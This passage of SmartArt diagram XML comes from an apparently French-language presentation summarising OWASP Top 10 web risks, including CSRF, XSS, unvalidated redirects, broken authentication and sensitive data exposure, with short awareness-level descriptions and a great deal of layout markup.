      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A8 - </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Falsification de requête </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>intersite</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> (CSRF)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF1391D4-B6B7-4AE2-B993-338C00C11B84}" type="parTrans" cxnId="{1AA23A82-4061-401B-A47E-EFAC421C5C82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05EEABB9-F420-43FF-B065-1A7F16C9839E}" type="sibTrans" cxnId="{1AA23A82-4061-401B-A47E-EFAC421C5C82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B5E7E68-CA72-4D92-A967-DF995646C3AC}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A10 – Redirections et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>renvois</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> non validés</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5ADD28B-795D-4030-8D34-142FCD3ADFA1}" type="parTrans" cxnId="{56EABEEA-509F-4220-B7FD-7B176CA17F0C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E086090F-2561-40F5-94CB-7FFBE1252C88}" type="sibTrans" cxnId="{56EABEEA-509F-4220-B7FD-7B176CA17F0C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4E8E996-7C5B-4BA4-B933-DE6C0BAA3728}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Les applications web réorientent et redirigent fréquemment les utilisateurs vers d'autres pages et sites internet, et utilisent des données non fiables pour déterminer les pages de destination. Sans validation appropriée, les attaquants peuvent réorienter les victimes vers des sites de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>phishing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> ou de malware, ou utiliser les renvois pour accéder à des pages non autorisées</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9927FDB-9211-4A14-A3B9-13F746B34567}" type="parTrans" cxnId="{9421F470-78C5-4566-AEE3-B492692D7446}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CEE520DC-DC8B-451B-A49E-0F5C4A893DD2}" type="sibTrans" cxnId="{9421F470-78C5-4566-AEE3-B492692D7446}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A1C44CE-CCA3-4BD0-B54E-89DB7E3E4543}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Les failles XSS se produisent chaque fois qu'une application accepte des données non fiables et les envoie à un browser web sans validation appropriée. XSS permet à des attaquants d'exécuter du script dans le navigateur de la victime afin de détourner des sessions utilisateur, défigurer des sites web, ou rediriger l'utilisateur vers des sites malveillants</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D06F3C25-B302-446A-981A-0C9D3ABE828A}" type="sibTrans" cxnId="{C09CDA34-B6A3-4717-8DE9-255D336A9884}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53F5BEB3-3EDE-4323-8D58-1235F631434F}" type="parTrans" cxnId="{C09CDA34-B6A3-4717-8DE9-255D336A9884}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1B85367-743A-4C9F-A891-07038BBF96F2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A3 – Cross-Site Scripting (XSS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{68A5A658-9210-4933-94F8-E5EB41BF4147}" type="sibTrans" cxnId="{D7526BF8-3D84-473A-BD13-72C4368227C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53C4939E-201B-4ED1-9161-7E355E0F4074}" type="parTrans" cxnId="{D7526BF8-3D84-473A-BD13-72C4368227C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA7DD3FF-C2BA-419E-88D3-4DE8B0D3FE4D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Les fonctions applicatives relatives à l'authentification et la gestion de session ne sont souvent pas mises en œuvre correctement, permettant aux attaquants de compromettre les mots de passe, clés, jetons de session, ou d'exploiter d'autres failles d'implémentation pour s'approprier les identités d'autres utilisateurs.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7383E11-2997-46ED-9CDE-19D4351797B7}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A2 – </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Violation de Gestion d'Authentification et de Session</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{528554B3-3377-4274-ADB1-6970BE43DEBB}" type="sibTrans" cxnId="{64EA57B5-69CD-49C3-9B03-E44D15D0B36F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7480DFFA-AE50-4F5A-9B34-549DC64CBECE}" type="parTrans" cxnId="{64EA57B5-69CD-49C3-9B03-E44D15D0B36F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35D55CF6-A108-42C3-AD8E-0484F859C755}" type="sibTrans" cxnId="{CEABDA5D-2CCD-47EA-91C3-340B08D5CA35}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3E3EC78-9BBC-41A1-9C38-D8A0F920D1EE}" type="parTrans" cxnId="{CEABDA5D-2CCD-47EA-91C3-340B08D5CA35}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DA0AAD8-DB42-4198-B614-1D5996278F65}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Beaucoup d'applications web ne protègent pas correctement les données sensibles telles que les cartes de crédit, identifiants d'impôt et informations d'authentification. Les pirates peuvent voler ou modifier ces données faiblement protégées pour effectuer un vol d'identité, de la  fraude à la carte de crédit ou autres crimes. Les données sensibles méritent une protection supplémentaire tel un chiffrement statique ou en transit, ainsi que des précautions particulières lors de l'échange avec le navigateur</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74651D76-1A4B-4035-A912-0E9B4AC31E56}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A6 – Exposition de données </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>sensibles</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{714A456E-0F05-4956-B40C-07B05BE592F8}" type="sibTrans" cxnId="{203150CC-0F3F-45BE-9F5A-D2254D61B2E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6854210-4FAC-4257-B882-980D94C69A89}" type="parTrans" cxnId="{203150CC-0F3F-45BE-9F5A-D2254D61B2E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84FC8053-FDE8-4A4C-8131-8A4B24494FE3}" type="sibTrans" cxnId="{CD4505AB-F295-4DBF-BDE3-234AE1950D08}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41F9CA30-D50A-4966-BDAE-8D4514BFA5E0}" type="parTrans" cxnId="{CD4505AB-F295-4DBF-BDE3-234AE1950D08}">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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" type="pres">
      <dgm:prSet presAssocID="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06753445-795E-4852-B39B-5A81E3AE22FA}" type="pres">
      <dgm:prSet presAssocID="{C7383E11-2997-46ED-9CDE-19D4351797B7}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{003658D4-D49D-4F10-A431-9B7DDB9AF5BC}" type="pres">
      <dgm:prSet presAssocID="{C7383E11-2997-46ED-9CDE-19D4351797B7}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52F1B1A3-C58C-409E-9189-6742201CA556}" type="pres">
      <dgm:prSet presAssocID="{C7383E11-2997-46ED-9CDE-19D4351797B7}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60C6FAA5-309B-4E4D-9AF3-F9B36FA3793F}" type="pres">
      <dgm:prSet presAssocID="{528554B3-3377-4274-ADB1-6970BE43DEBB}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{607560B6-B977-4D1C-97A0-595C7A55205A}" type="pres">
      <dgm:prSet presAssocID="{A1B85367-743A-4C9F-A891-07038BBF96F2}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6F3CB7F-5F61-44E3-9C30-A5FD20B57740}" type="pres">
      <dgm:prSet presAssocID="{A1B85367-743A-4C9F-A891-07038BBF96F2}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C8316E6-CCC6-432E-9248-FEE6B536ED74}" type="pres">
      <dgm:prSet presAssocID="{A1B85367-743A-4C9F-A891-07038BBF96F2}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{232A10D5-9CE7-4866-9B98-3442E96D191C}" type="pres">
      <dgm:prSet presAssocID="{68A5A658-9210-4933-94F8-E5EB41BF4147}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56A0CB35-4DB9-4A39-BA7D-CE8C25A49E42}" type="pres">
      <dgm:prSet presAssocID="{2BD590FA-9231-49C0-97E0-217A496C2237}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BBDFC2B-854A-4CD2-A909-AD613CC7FC62}" type="pres">
      <dgm:prSet presAssocID="{2BD590FA-9231-49C0-97E0-217A496C2237}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{191C5091-28DD-4765-9653-28B6CE68C4E4}" type="pres">
      <dgm:prSet presAssocID="{2BD590FA-9231-49C0-97E0-217A496C2237}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A6A0E46-45CA-442A-8601-BBA2D73584E4}" type="pres">
      <dgm:prSet presAssocID="{ECA2D58B-5985-4D42-8ACF-DA4EEB388D97}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F793DF08-4A07-4166-B1E1-1D362BA95C8F}" type="pres">
      <dgm:prSet presAssocID="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E090A74-1099-4AEA-9902-A404935E56DA}" type="pres">
      <dgm:prSet presAssocID="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC3A35B8-DD6D-4881-97A7-11F37E912D62}" type="pres">
      <dgm:prSet presAssocID="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{614D783F-9EA6-4A55-A7F2-79B49F95A4D5}" type="pres">
      <dgm:prSet presAssocID="{0D3D0307-BCC6-4666-B008-AB05B3454592}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5C6E04D9-34F9-48BA-AE99-367B8D0960C9}" type="pres">
      <dgm:prSet presAssocID="{74651D76-1A4B-4035-A912-0E9B4AC31E56}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83DCA457-5C79-4624-88A4-3B0DB935FCFB}" type="pres">
      <dgm:prSet presAssocID="{74651D76-1A4B-4035-A912-0E9B4AC31E56}" presName="parentText" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5AF71587-9F2C-4EC1-B860-6DD404B4035A}" type="pres">
      <dgm:prSet presAssocID="{74651D76-1A4B-4035-A912-0E9B4AC31E56}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="5" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A869A77-087B-4990-95D8-340F0D6466A4}" type="pres">
      <dgm:prSet presAssocID="{714A456E-0F05-4956-B40C-07B05BE592F8}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07DBCB74-C0C4-443F-B333-47E942AEDD04}" type="pres">
      <dgm:prSet presAssocID="{09240EC7-522E-4395-8D61-1A972E9AC8FE}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAA2C47D-B4B2-4B6C-88DC-FF4BB6876945}" type="pres">
      <dgm:prSet presAssocID="{09240EC7-522E-4395-8D61-1A972E9AC8FE}" presName="parentText" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="10" custScaleX="48148">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56FADFE1-1107-40A2-AFFA-1F804BA9889C}" type="pres">
      <dgm:prSet presAssocID="{09240EC7-522E-4395-8D61-1A972E9AC8FE}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="6" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E59023DB-6273-42AA-AC15-3F73F1A109E5}" type="pres">
      <dgm:prSet presAssocID="{DC6AC552-EC1D-4C41-BC2A-2A31755C14D6}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08B3E8E4-0A68-4271-BBB4-E93B6D85CD3F}" type="pres">
      <dgm:prSet presAssocID="{930B7E02-7BD0-4A1A-8B80-F9B89ACD00BA}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF125120-BBE5-4C6D-A4D9-AA1EC3299EDE}" type="pres">
